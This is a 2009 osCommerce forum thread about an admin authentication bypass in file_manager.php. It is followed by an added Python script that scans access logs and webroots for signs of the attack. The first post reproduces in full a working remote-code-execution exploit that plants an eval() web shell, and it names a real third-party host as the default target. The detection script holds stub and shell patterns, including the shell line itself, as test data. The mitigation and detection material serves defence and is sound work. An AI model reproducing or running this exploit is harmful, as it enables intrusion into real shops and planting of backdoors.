Pipeloops Posted September 11, 2009

Hi all, recently a couple of sites (including my own) have been hacked using a new exploit. Please have a look at this thread: http://www.oscommerce.com/forums/index.php?showtopic=344272. The attacker installed a backdoor (c99madShell) and also added a stub into each and every PHP file on the site that would execute some code (don't know yet for what purpose) each time any page on your site is called up. This hack uses a recently discovered code injection exploit with file_manager.php.

PLEASE NOTE: None of the measures in the "Secure your Site" thread prevent this attack! On my site all contributions mentioned in the thread are installed and active, and all folder and file attributes are set correctly, still I got hacked. And I just tried the exploit with the script (see below) again, and it still works when I reactivate the file manager.

There is only ONE method to prevent this: Rename or delete file_manager.php, so the attacker does not find it!!!

Here is the attack script. If you think you are safe, just insert your hostname in $host, put this file on your server (or run it locally in XAMPP), and see what you get when you visit the link it shows after running.

I would appreciate it if a mod can make this sticky, so it gets noticed by everybody!
Thanks, Reiner

<?php
print_r('
+---------------------------------------------------------------------------+
osCommerce Online Merchant 2.2 RC2a RCE Exploit by Flyh4t
mail: [email protected]
team: http://www.wolvez.org
dork: Powered by osCommerce
Gr44tz to q1ur3n 、puret_t、uk、toby57 and all the other members of WST
Thx to exploits of blackh
+---------------------------------------------------------------------------+
');

$host       = 'democn.51osc.com';   // target host (put your own hostname here to test your site)
$path       = '/';
$admin_path = 'admin/';             // assumes the default admin directory name

// Body of the forged "save file" request: the file written by file_manager.php
// is a one-line PHP shell that evals whatever is posted in the aifly parameter.
$shellcode = "filename=fly.php&file_contents=test<?php%20@eval(\$_POST[aifly]);?>";

// The "/login.php" appended after file_manager.php is PATH_INFO: the admin
// session check only looks at the script name, sees login.php and skips the
// login requirement, so file_manager.php runs unauthenticated.
$message  = "POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n";
$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Accept-Encoding: gzip, deflate\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message .= "Host: $host\r\n";
$message .= "Content-Length: ".strlen($shellcode)."\r\n";
$message .= "Connection: Close\r\n\r\n";
$message .= $shellcode;

// Raw socket send so no HTTP library normalises the path.
$fd = fsockopen($host, '80');
if (!$fd) {
    echo '[~]No response from '.$host;
    die;
}
fputs($fd, $message);
fclose($fd);
echo ("[+]Go to see U webshell : $host/fly.php");
?>

# milw0rm.com [2009-08-31]
jackanderson Posted September 11, 2009

Thanks for the heads up. Really appreciate it.

Converge
Giovanna Posted September 11, 2009

This has already been discussed in July! (http://www.oscommerce.com/forums/index.php?showtopic=340995) Removing file_manager.php is a beginning, as it shouldn't be used to edit your site anyway. If you look at the code you posted, it assumes the admin path is www.yoursite.com\admin. You are still vulnerable if you leave your admin site as admin, as they will find another way to hack in. So please, everyone, follow the instructions in the link here and rename your admin.
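The two posts above describe an attack signature (a POST to file_manager.php with "/login.php" appended as path info) and its aftermath (a dropped eval() shell plus a stub injected into every PHP file), and two fixes (remove file_manager.php, rename the admin directory). The following triage script is an added example, not code from this thread or from osCommerce: it pulls bypass requests out of access logs, scans a webroot for the stub patterns, and reports whether the file manager and default admin directory are still exposed. It assumes Apache combined-format log lines and a webroot laid out as root/admin_dir/file_manager.php; the log lines and site files it uses are constructed for the demonstration.

```python
"""Triage helpers for the file_manager.php incident discussed in this thread.

Added example, not code from the thread or from osCommerce. Assumes Apache
combined-format access logs and a webroot laid out as <root>/<admin_dir>/
file_manager.php. LOG_LINES and the sample site are constructed test data.
"""
import os
import re
import tempfile

# The posted exploit requests .../file_manager.php/login.php?action=save. The
# "/login.php" after the script name is PATH_INFO; the admin session check only
# inspects the script name, so any path info after file_manager.php is a flag.
BYPASS_RE = re.compile(r'"(?:POST|GET) [^" ]*/file_manager\.php/[^" ]* HTTP/')

# Patterns typical of the dropped one-liner (eval of request data), of encoded
# stubs prepended to existing PHP files, and of the c99madShell backdoor name.
STUB_PATTERNS = {
    "eval of request data": re.compile(
        r'eval\s*\(\s*(?:base64_decode\s*\()?\s*\$_(?:POST|GET|REQUEST|COOKIE)\b'),
    "eval of encoded blob": re.compile(
        r'eval\s*\(\s*(?:gzinflate|gzuncompress|str_rot13|base64_decode)\s*\('),
    "c99madShell marker": re.compile(r'c99(?:mad)?shell', re.IGNORECASE),
}

# Constructed sample log lines (RFC 5737 documentation addresses, not real traffic).
LOG_LINES = [
    '203.0.113.5 - - [31/Aug/2009:10:12:01 +0000] "POST /admin/file_manager.php/login.php?action=save HTTP/1.1" 200 311 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"',
    '203.0.113.5 - - [31/Aug/2009:10:12:03 +0000] "POST /fly.php HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"',
    '198.51.100.7 - - [31/Aug/2009:10:15:44 +0000] "GET /admin/file_manager.php?action=edit HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [31/Aug/2009:10:16:10 +0000] "GET /index.php?cPath=22 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

# Constructed webroot: one clean storefront file, one file with an injected stub
# on line 1, a placeholder admin file manager, and the dropped shell.
SAMPLE_FILES = {
    "index.php": "<?php\n  require('includes/application_top.php');\n  echo 'storefront';\n?>\n",
    "includes/application_top.php": "<?php eval(base64_decode('ZWNobyAnc3R1Yic7')); ?>\n<?php\n  session_start();\n?>\n",
    "admin/file_manager.php": "<?php\n  // placeholder standing in for the stock admin file manager\n?>\n",
    "fly.php": "test<?php @eval($_POST[aifly]);?>",
}


def find_bypass_requests(log_lines):
    """Return log lines whose request path carries path info after file_manager.php."""
    return [line for line in log_lines if BYPASS_RE.search(line)]


def find_backdoor_stubs(root):
    """Walk a webroot; return sorted (relative path, line number, pattern name) hits."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith((".php", ".phtml", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    for label, pattern in STUB_PATTERNS.items():
                        if pattern.search(line):
                            hits.append((rel, lineno, label))
    return sorted(hits)


def admin_exposure(root, admin_dir="admin"):
    """Report whether file_manager.php is still present and whether the admin dir keeps its default name."""
    return {
        "file_manager_present": os.path.isfile(os.path.join(root, admin_dir, "file_manager.php")),
        "default_admin_dir": admin_dir == "admin",
    }


def build_sample_site():
    """Write SAMPLE_FILES into a fresh temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="osc_triage_")
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for line in find_bypass_requests(LOG_LINES):
        print("bypass request:", line)
    for rel, lineno, label in find_backdoor_stubs(site):
        print(f"{rel}:{lineno}: {label}")
    print("exposure:", admin_exposure(site))
```

Run it against a real site by pointing find_backdoor_stubs at the webroot and feeding find_bypass_requests the lines of the access log; any hit on file_manager.php with path info from before the file was removed is the time to start the timeline from, and every file the stub scan flags needs to be restored from a clean copy rather than edited in place.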